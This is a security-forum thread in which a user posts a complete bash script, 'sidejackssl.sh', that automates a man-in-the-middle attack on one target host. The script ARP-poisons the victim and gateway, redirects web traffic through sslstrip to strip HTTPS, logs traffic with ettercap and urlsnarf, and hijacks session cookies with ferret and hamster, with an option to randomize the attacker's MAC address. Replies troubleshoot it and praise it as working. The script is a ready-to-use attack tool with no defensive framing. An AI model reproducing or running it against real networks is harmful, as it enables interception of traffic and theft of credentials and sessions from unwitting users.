Page 1 of 2 12 LastLast
Results 1 to 10 of 15

Thread: Another script for sidejacking..

  1. #1
    Just burned his ISO
    Join Date
    Nov 2010
    Location
    Greece
    Posts
    7

    Default Another script for sidejacking..

    I know there are other scripts out there that do the same thing but, here is one I made. Perhaps someone else will find it useful. It basically uses hamster, ferret, sslstrip, ettercap, urlsnarf, and arpspoof, although adding your favourite program shouldn't be too difficult.

    I tested it in Backtrack 4 R2. One thing to note is the paths of ferret and hamster are hardcoded because it seems there is a problem with just executing them as is. At least on my R2 installation. You can customize it to suit your own needs, like the xterm window sizes and a few other things.

    Code is here:
    Gorara - sidejackssl.sh

    And here:
    Code:
    #!/bin/bash
    
    # sidejackssl.sh v0.1
    # tested in backtrack 4 R2 environment, run as root.
    # xterm used for window control
    # arpspoof poisons a single victim and gateway
    # ferret and hamster for sidejacking
    # sslstrip for https
    # ettercap for everything else
    # urlsnarf to monitor visited urls
    # firefox needs to be configured with a proxy of 127.0.0.1:1234
    # url for hamster server is http://hamster
    # by gorara
    
    # a few variables (do not change)
    m1="0"					# missing file var m1
    m2="0"					# missing file var m2
    m3="0"					# missing file var m3
    m4="0"					# missing file var m4
    quickclean="0"				# used for quick clean up
    randmac="n"				# default setting do not randomize MAC
    hamsterfile="hamster.txt"		# hamster output file (you can't change it)
    trap 'cleanup' SIGINT SIGTERM		# detect control-c
    
    # a few more variables (change these if required)
    
    # xterm window variables
    x="0"					# x offset value
    y="0"					# y offset value
    width="120"				# width value
    height="7"				# height value
    yoffset="120"				# y offset
    fgcolor="white"				# foreground color
    bgcolor="black"				# background color
    
    # style variables
    warnstyle="[\e[01;38mw\e[00m]"		# warning msgs style
    execstyle="[\e[01;32mx\e[00m]"		# execute msgs style
    infostyle="[\e[01;34mi\e[00m]"		# informational msgs style
    inputstyle="[\e[01;30m?\e[00m]"		# input msgs style
    
    # file variables
    sslstripfile="sslstrip.log"		# sslstrip output file name
    snifffile="sniff-*"			# hamster sniff file wildcard
    etterfile="etter.cap"			# ettercap output cap file
    temp="/tmp"				# temporary dir
    
    function usage
    {
    	clear
    	echo "Usage: bash $0 -i interface -t target -g gateway [-r] [-h]"
    	echo ""
    	echo "	-i interface	interface to use, ex. eth0, wlan0."
    	echo "	-t target	the target IP address."
    	echo "	-g gateway	the gateway IP address."
    	echo "	-r		randomize your MAC address,"
    	echo "			only use for wired interfaces."
    	echo "	-h		display this help screen."
    	echo ""
    	echo "	examples: "
    	echo "	 bash $0 -i eth0 -t 192.168.0.1 -g 192.168.0.254 -r"
    	echo "	 bash $0 -i wlan0 -t 192.168.0.1 -g 192.168.0.254"
    	echo ""
    	exit 0
    }
    
    function cleanup() {
    echo -e "\n$warnstyle control-c pressed! "
    
    # exit script if nothing has been modified
    if [[ "$quickclean" = "1" ]]; then
    echo -e "$infostyle nothing changed, all done!"
    exit 0
    fi
    
    echo -e "$infostyle cleaning up..."
    echo -e "$execstyle flushing iptables..."
    iptables -F
    iptables -t nat -F
    
    echo -e "$execstyle turning off IP forwarding..."
    echo "0" > /proc/sys/net/ipv4/ip_forward
    
    # change back MAC address to orignal one
    if [[ "$randmac" = "y" || "$randmac" = "Y" ]]; then
    echo -e "$execstyle resetting MAC address...";
    echo -e "$infostyle original MAC is: $origmac"
    ifconfig $interface down
    ifconfig $interface hw ether $origmac
    ifconfig $interface up
    	if [ -z $gw ]; then
    	echo -e "$warnstyle WARNING, you have no default gateway!"
    	else
    	route add default gw $gw
    	fi
    rm $temp/mac.orig
    rm $temp/gw.orig
    fi
    
    echo -e "$execstyle cleaning up files..."
    echo -e "$infostyle temp directory: "
    
    # testing to see if files exist, if so display them...
    	if [ -f $temp/$sslstripfile ]; then
    	ls $temp/$sslstripfile
    	else
    	#echo -e "$warnstyle missing $sslstripfile"
    	m1="1"
    	fi
    
    	if [ -f $temp/$etterfile ]; then
    	ls $temp/$etterfile
    	else
    	#echo -e "$warnstyle missing $etterfile"
    	m2="1"
    	fi
    
    echo -e "$infostyle current directory: "
    
    	if [ -f $snifffile ]; then
    	ls $snifffile
    	else
    	#echo -e "$warnstyle missing $snifffile"
    	m3="1"
    	fi
    
    	if [ -f $hamsterfile ]; then
    	ls $hamsterfile
    	else
    	#echo -e "$warnstyle missing $hamsterfile"
    	m4="1"
    	fi
    
    # testing to see if there are any files at all
    if [[ $m1 -eq 0 || $m2 -eq 0 || $m3 -eq 0 || $m4 -eq 0 ]]; then
    
    while [[ "$delete" != "y" || "$delete" != "n" ]]
    
    echo -en "$infostyle delete file(s)? [y/n]: " 
    read delete
    
    do
        case "$delete" in
            y) delete_marker="y"; echo -e "$warnstyle deleting files!"; break;;
    	n) echo -e "$warnstyle nothing deleted!"; break;;
        	*) echo -e "$warnstyle wrong selection!";
        esac
    done
    
    # delete files as requested
    if [[ "$delete_marker" = "y" ]]; then
    	if [ -f $temp/$sslstripfile ]; then
    	rm $temp/$sslstripfile
    	fi
    
    	if [ -f $temp/$etterfile ]; then
    	rm $temp/$etterfile
    	fi
    
    	if [ -f $snifffile ]; then
    	rm $snifffile
    	fi
    
    	if [ -f $hamsterfile ]; then
    	rm $hamsterfile
    	fi
    fi
    
    else
    
    	echo -e "$warnstyle nothing to delete!"
    fi
    
    echo -e "$infostyle all done!"
    exit 0
    }
    
    
    # start main program
    if [ "$#" -eq 0 ]; then
    usage
    fi
    
    while [ "$#" -gt 0 ]
    do
        case "$1" in
            -i)  interface=$2; shift 1;;
    	-r)  randmac="y"; shift 1;;
    	-t)  target=$2; shift 1;;
    	-g)  gateway=$2; shift 1;;
    	-h)  usage;;
    	-*)  usage; break;;
    	*)  break;;
        esac
        shift
    done
    
    # required parameters
    if [[ -z $interface || -z $target || -z $gateway ]]; then
    usage
    exit 0
    fi
    
    clear
    
    if [[ "$randmac" = "y" ]]; then
    mac="yes"
    else
    mac="no"
    fi
    
    # set quick cleanup flag
    quickclean="1"
    
    echo -e "$infostyle sidejacker/sslstrip script v0.1, by gorara"
    echo -e "$infostyle ctrl-c to abort at any time."
    echo -e "$infostyle attack summary:"
    echo -e "$infostyle host $target and gateway $gateway from $interface, spoof MAC: $mac"
    
    if [[ "$randmac" = "y" ]]; then 
    
    echo -e "$execstyle change of $interface MAC address requested."
    
    if [[ "$interface" = wlan* || "$interface" = wifi* || "$interface" = ath* ]]; then
    echo -e "$infostyle wireless device detected..." 
    echo -e "$warnstyle can't change MAC address without taking wifi interface down"
    echo -e "$warnstyle do it manually before connecting to the AP."
    exit 0
    fi
    
    if [[ "$interface" = eth* ]]; then
    echo -e "$infostyle wired device detected..." 
    echo -e "$warnstyle WARNING, this will take your wired interface down temporarily."
    echo -en "$inputstyle do you want to continue? [y/n]: "
    read continue
    	if [[ "$continue" = "y" ]]; then
    	echo -e "$infostyle proceeding..."
    	else
    	echo -e "$infostyle exiting..."
    	exit 0	
    	fi
    fi
    
    origmac=`ifconfig $interface | grep HWaddr | awk {'print $5'}`
    
    fi
    
    # before this, ctrl-c will exit script without doing anything.
    quickclean="0"
    
    # use macchanger to randomize MAC address, ect.
    if [[ "$randmac" = "y" || "$randmac" = "Y" ]]; then 
    echo -e "$execstyle randomizing MAC address...";
    gw=`route -n | grep UG | awk {'print $2'}` > $temp/gw.orig
    ifconfig $interface down
    macchanger -r $interface > $temp/mac.orig
    ifconfig $interface up
    	if [ -z $gw ]; then
    	echo -e "$warnstyle WARNING, you have no default gateway!"
    	else
    	route add default gw $gw
    	fi
    origmac=`cat $temp/mac.orig | grep Current | awk {'print $3'}`
    fakemac=`cat $temp/mac.orig | grep Faked | awk {'print $3'}`
    echo -e "$infostyle original MAC is: $origmac"
    echo -e "$infostyle faked    MAC is: $fakemac"
    fi
    
    echo -e "$execstyle turning on IP Forwarding..."
    echo "1" > /proc/sys/net/ipv4/ip_forward
    
    echo -e "$execstyle configuring iptables..."
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    sleep 1
    
    echo -e "$execstyle starting hamster  ... <logging to: $hamsterfile>"
    xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "hamster" -e /pentest/sniffers/hamster/hamster &
    sleep 2
    
    echo -e "$execstyle starting ferret   ... <logging to: console>"
    y=$(($y+$yoffset))
    xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "ferret" -e /pentest/sniffers/hamster/ferret -i $interface &
    sleep 2
    
    echo -e "$execstyle starting sslstrip ... <logging to: $temp/$sslstripfile>"
    y=$(($y+$yoffset))
    xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "sslstrip" -e sslstrip -w $temp/$sslstripfile &
    sleep 2
    
    echo -e "$execstyle starting ettercap ... <logging to: $temp/$etterfile>"
    y=$(($y+$yoffset))
    xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "ettercap" -e ettercap -Tqpi $interface -w $temp/$etterfile /$gateway/ /$target/ &
    sleep 2
    
    echo -e "$execstyle starting urlsnarf ... <logging to: console>"
    y=$(($y+$yoffset))
    xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "urlsnarf" -e urlsnarf -i $interface &
    sleep 2
    
    echo -e "$infostyle trap is ready, now to direct traffic..."
    
    echo -e "$execstyle ARP poisoning the target..."
    y=$(($y+$yoffset))
    xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "arpspoof" -e arpspoof -i $interface -t $target $gateway &
    sleep 1
    
    echo -e "$infostyle run firefox and type http://hamster"
    echo -e "$infostyle don't forget to set proxy to 127.0.0.1:1234"
    echo -e "$infostyle press ctrl-c to exit and clean up... \n"
    for ((;;)) do 
    read loop
    echo -en "$infostyle press ctrl-c to terminate!"
    done
    
    exit 0

  2. #2
    Junior Member
    Join Date
    Jan 2010
    Posts
    55

    Default Re: Another script for sidejacking..

    Very slick. Will test tonight and provide feedback. You should start a google code page to track changes.

  3. #3
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    13

    Default Riferimento: Another script for sidejacking..

    its not working , i use r2 but i get eror when run it

    sh sidejacking.sh

  4. #4
    Administrator sickness's Avatar
    Join Date
    Jan 2010
    Location
    Behind the screen.
    Posts
    2,921

    Default Re: Riferimento: Another script for sidejacking..

    Quote Originally Posted by Xploit View Post
    its not working , i use r2 but i get eror when run it

    sh sidejacking.sh
    And we are just suppose to know what happened if you don't give us the error message ?
    Back|track giving machine guns to monkeys since 2007 !

    Do not read the Wiki, most your questions will not be answered there !
    Do not take a look at the: Forum Rules !

  5. #5
    Member
    Join Date
    Feb 2010
    Location
    MTI3LjAuMC4x
    Posts
    90

    Default Re: Riferimento: Another script for sidejacking..

    Quote Originally Posted by Xploit View Post
    its not working , i use r2 but i get eror when run it

    sh sidejacking.sh
    I am going to take a guess

    you need to

    chmod +x sidejacking.sh

    (you need to make the script executable)

  6. #6
    Just burned his ISO
    Join Date
    Nov 2010
    Location
    Greece
    Posts
    7

    Default Re: Riferimento: Another script for sidejacking..

    Quote Originally Posted by spudgunman View Post
    I am going to take a guess

    you need to

    chmod +x sidejacking.sh

    (you need to make the script executable)
    Actually, thats not really required, simply copy-paste code into file, save as sidejackssl.sh (or whatever you want), and run as such:

    Code:
    bash sidejackssl.sh
    It requires parameters, which the script will show you if you run it like this. You can change it to make it executable and run as ./sidejackssl.sh if you wish.

  7. #7
    Just burned his ISO
    Join Date
    Nov 2010
    Posts
    4

    Default Re: Another script for sidejacking..

    root@bt:~# bash sidejackssl.sh
    : command not founde 2:
    : command not founde 14:
    : command not founde 24:
    : command not founde 26:
    : command not founde 35:
    : command not founde 41:
    : command not founde 47:
    'idejackssl.sh: line 49: syntax error near unexpected token `{
    'idejackssl.sh: line 49: `{

    Im attempting too run this on BT4-R2. I get this error doing it both "bash sidejackssl.sh" and "./sidejackssl.sh"

    just reporting, im sorry if the answer is simple and beyond my grasp.

  8. #8
    Just burned his ISO
    Join Date
    Nov 2010
    Location
    Greece
    Posts
    7

    Default Re: Another script for sidejacking..

    Quote Originally Posted by fromthestars View Post
    Im attempting too run this on BT4-R2. I get this error doing it both "bash sidejackssl.sh" and "./sidejackssl.sh"

    just reporting, im sorry if the answer is simple and beyond my grasp.
    It looks like you may have copy-pasted the code from pastebin, if so you may have copied the line numbers too. Try pressing the RAW option in pastebin and copy the raw text, or copy the code from the initial post.

  9. #9
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    13

    Default Riferimento: Another script for sidejacking..

    : command not founde 2:
    : command not founde 14:
    : command not founde 24:
    : command not founde 26:
    : command not founde 35:
    : command not founde 41:
    : command not founde 47:
    'idejackssl.sh: line 49: syntax error near unexpected token `{
    'idejackssl.sh: line 49: `{

  10. #10
    Junior Member
    Join Date
    Aug 2010
    Posts
    51

    Default Re: Another script for sidejacking..

    Absolutely brilliant. It works like a bomb. I just need to test the BackTrack Linux - Penetration Testing Distribution proxy but rest of the stuff in the meantime.

    Excellent work

Page 1 of 2 12 LastLast

Similar Threads

  1. [Video] Session Sidejacking (Ferret and Hamster)
    By imported_g0tmi1k in forum OLD BackTrack 4 Howto
    Replies: 2
    Last Post: 03-19-2010, 08:57 PM
  2. Sidejacking on wep networks?
    By EndOfDays442 in forum Beginners Forum
    Replies: 1
    Last Post: 03-16-2010, 06:17 PM
  3. Sidejacking after decrypting WPA packets from capture
    By purehate in forum OLD BT4 Videos
    Replies: 0
    Last Post: 10-03-2009, 05:15 PM
  4. SideJacking
    By imported_Speedy in forum OLD Tutorials and Guides
    Replies: 6
    Last Post: 11-16-2008, 12:58 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •